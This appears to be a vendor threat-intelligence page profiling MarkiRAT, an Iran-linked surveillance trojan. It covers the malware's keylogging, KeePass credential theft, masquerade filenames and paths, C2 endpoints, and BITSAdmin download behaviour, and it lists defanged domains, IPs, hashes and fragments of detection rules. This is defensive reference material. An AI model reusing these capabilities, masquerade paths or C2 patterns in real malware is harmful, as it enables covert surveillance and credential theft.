MarkiRAT
MarkiRAT is a custom remote access trojan/backdoor associated with the Iran-linked TAG-182 activity cluster and also reported in connection with the Iran-linked Ferocious Kitten threat group. The malware has been used in cyber-surveillance operations and provides broad collection and remote access capabilities. Reported functionality includes retrieving the victim username, capturing all keystrokes, capturing clipboard contents, taking screenshots saved initially as "scr.jpg", searching the filesystem for targeted file types and credential stores, gathering information from the KeePass password manager, checking for the Telegram installation directory by enumerating files on disk, checking running processes for Kaspersky and Bitdefender antivirus products, and using the GetKeyboardLayout API to determine whether the compromised host keyboard is set to Persian. MarkiRAT can execute arbitrary or remote commands, store collected data locally in a created .nfo file, and exfiltrate staged data over its C2 channel, including staged exfiltration over HTTP(S). The malware has masqueraded as update.exe and svehost.exe, and has also mimicked legitimate Telegram and Chrome files; one listed path is C:\Users\Public\AppData\Windows\svehost.exe. Supporting detection content also references BITSAdmin-based payload download activity tied to MarkiRAT, including use of /i.php?u= and /uploadx.php endpoints, and notes that it has been delivered under filenames such as YEPlayer.dll, YEMPlayer.zip, YEMPlayer.msi, Pis2rayVPN.msi, Pis2rayVPN.zip, and Pis2rayN.dll. Observed infrastructure and indicators mentioned in the content include domains yeplayer[.]store, yemplayer[.]site, pis2ray[.]online, microsoft[.]comi-site[.]website, microsotf[.]comi-site[.]website; IPs 45[.]86[.]162[.]197, 46[.]30[.]191[.]105, 46[.]30[.]191[.]123, 89[.]144[.]145[.]237, 89[.]144[.]145[.]239, and 212[.]83[.]61[.]198; and sample SHA-256 hashes 13440348516ccee839675f6ac908dd1724ce1d28f92af92fdc7938740d2b7ec5, bb0c7ae4f12e5141480ee26f473636b07e836bb994ff3b2cfec93d4480da171b, and fa246327bed8fc5864827a8147b8b7aedb6246068259b8c97e82adb957315347.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Over multiple years, the group developed and deployed a custom implant known as MarkiRAT that provides broad collection capabilities, keystroke and clipboard logging, screenshots, filesystem searches for targeted file types and credential stores, remote command execution, and staged exfiltration over HTTP(S).
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
TAG-182’s malware scheme is likely one of the myriad tactics, techniques, and procedures (TTPs) used by these organizations... rule APT_IR_TAG182_MarkiRAT_2 ... description = "Track the main backdoor of TAG-182, MarkiRAT" ... title: MarkiRAT Malware Bitsadmin File Download ... description: Detects the use of bitsadmin to download a file from a remote URL by MarkiRAT malware used by Iran-Nexus TAG-182.
Over multiple years, the group developed and deployed a custom implant known as MarkiRAT that provides broad collection capabilities, keystroke and clipboard logging, screenshots, filesystem searches for targeted file types and credential stores, remote command execution, and staged exfiltration over HTTP(S).
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
3 techniques
Execution
tags: - attack.t1197 # BITS Jobs - attack.t1059.003 # Command and Scripting Interpreter: Windows Command Shell
Persistence
3 techniques
Persistence
title: MarkiRAT Malware Bitsadmin File Download ... description: Detects the use of bitsadmin to download a file from a remote URL by MarkiRAT malware used by Iran-Nexus TAG-182. ... tags: - attack.t1197 # BITS Jobs
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. | Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders.
Privilege Escalation
2 techniques
Privilege Escalation
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. | Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders.
Stealth
3 techniques
Stealth
During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.
Credential Access
3 techniques
Credential Access
Fox Kitten has used scripts to access credential information from the KeePass database. Indrik Spider has accessed and exported passwords from password managers. Proton gathers credentials in files for 1password. TrickBot can steal passwords from the KeePass open source password manager.
LAPSUS$ has accessed local password managers and databases to obtain further credentials from a compromised network. Scattered Spider has searched for credentials in password vaults and Privileged Access Management (PAM) solutions including HashiCorp Vault. Storm-0501 has stolen credentials contained in the password manager Keepass by utilizing Find-KeePassConfig.ps1.
Discovery
6 techniques
Discovery
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
"Bazar can query the Registry for installed applications." / "BRONZE BUTLER has used tools to enumerate software installed on an infected host." / "LightSpy ... enumerate the Applications folder to collect the bundle name, bundle identifier, and version information..." / "Volt Typhoon has queried the Registry on compromised systems for information on installed software."
Avaddon checks for specific keyboard layouts and OS languages to avoid targeting Commonwealth of Independent States (CIS) entities... Bazar can perform a check to ensure that the operating system's keyboard and language settings are not set to Russian... Clop has checked the keyboard language using the GetKeyboardLayout() function... Ryuk has been observed to query the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language and the value InstallLanguage.
Collection
5 techniques
Collection
The content repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration.
"Agent Tesla can capture screenshots of the victim’s desktop"; "AppleSeed can take screenshots on a compromised host"; "APT28 has used tools to take screenshots from victims"; "Cobalt Strike's Beacon payload is capable of capturing screenshots"; "PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals"; "Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop"
Command and Control
1 technique
Command and Control
IOCs tracked for this family
56 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
27 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
MarkiRAT is described as the main backdoor used by TAG-182. It uses BITSAdmin to download payloads from remote URLs, communicates with C2 endpoints via /i.php and /uploadx.php, uploads data, and includes screenshot-capture functionality for surveillance.
Custom espionage implant/RAT used by Ferocious Kitten for surveillance and data theft: keylogging and clipboard capture, screenshots, file and directory discovery, targeted collection of sensitive file types (including credential/key store formats like KeePass .kdbx), remote command execution, and HTTP(S)-based C2 with staged exfiltration. Also uses persistence via startup folder and execution-flow hijacking by planting alongside legitimate apps (e.g., Telegram/Chrome) and modifying shortcuts.
Enterprise New Software: ... MarkiRAT
RAT used for dissident surveillance: keylogging, clipboard capture, file upload/download, and arbitrary command execution; traced back to at least 2015; variants hijack Telegram/Chrome execution for persistence.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.